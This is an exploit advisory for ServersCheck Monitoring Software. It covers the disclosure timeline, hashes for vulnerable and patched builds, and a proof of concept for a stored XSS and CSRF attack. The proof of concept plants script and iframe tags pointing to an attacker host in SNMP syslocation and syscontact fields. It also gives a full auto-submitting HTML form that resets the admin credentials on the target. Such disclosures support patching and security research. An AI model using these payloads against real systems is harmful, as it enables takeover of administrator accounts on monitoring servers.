# Author: loneferret of Offensive Security
# Product: ServersCheck Monitoring Software
# Version: 9.0.12 - 9.0.14 (some versions of 9.0.15)
# Vendor Site: http://www.serverscheck.com
# Software Download: http://www.serverscheck.com/monitoring_software/download.asp
# Note: Older Appliances may be affected.
# Discovered: August 18th 2012
# Disclosure:
# August 18th 2012: Reported to CERT
# September 5th 2012: Tentative disclosure date October 10th 2012
# September 5th 2012: Vendor requesting information/procedure on how to reproduce
# September 5th 2012: Sent vendor procedures
# September 5th 2012: Vendor says newer version not affected
# September 5th 2012: Tested new version, conclusion still affected
# September 5th 2012: Newer s-server.exe file supplied/tested version is patched.
# September 6th 2012: 9.0.15 download version is now patched.
# October 10th 2012: Public release
# Software Description:
# The core of our Monitoring Solution is the award winning ServersCheck Monitoring Software.
# This software enables you to monitor any networked device for its availability
# and performance. It is agentless: no need to have agents installed on the remote
# systems being monitored. It can run on your own Windows system or you can
# get it as a box: the ServersCheck Monitoring Appliance.
# Vulnerabilities:
# The file responsible the vulnerability is called "s-server.exe".
# From the 3 versions tested the file's version does not change, so looking at the
# MD5 hash can help us determine if an installation is using vulnerable file.
# One can only assume that 9.0.13 is vulnerable.
# Versions 9.0.12 & 9.0.14 & 9.0.15 (vulnerable):
# s-server.exe HASH: MD5 (s-server.exe) = af38d77e0b150d96f68cba4c3e65f316
# Version 9.0.15 (patched):
# s-server.exe HASH: MD5 (s-server.exe) = 3e01ff7201df4eb1c0091784a40f3055
# PoC:
# Store XSS & Cross Site Request Forgery
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
# JavaScript file.
# ..
# syslocation <script src="http://attacker/xss.js"></script>
# syscontact <iframe src="http://attacker/scheck-csrf.html"></iframe>
# CSRF PoC:
# We can also use the previous XSS to trigger this. Makes for a funny.
# Change Admin credentials
# File scheck-csrf.html
<html>
<body onload="trigger()">
<script>
function trigger() {
document.getElementById('bad_form').submit();
}
</script>
<form id="bad_form" method="post" action="http://target:1272/settings2.html">
<input name="systemsetting" value="secure" type="hidden">
<input name="setting" value="SECURE" type="hidden">
<input value="ok" name="changedsettings" type="hidden">
<input name="systemsetting" value="SECURE" type="hidden">
<input name="XYXadminuser" size="30" value="loneferret" type="hidden"><br>
<input name="adminpass" size="30" value="123456" type="hidden"><br>
</form>
</body>
</html>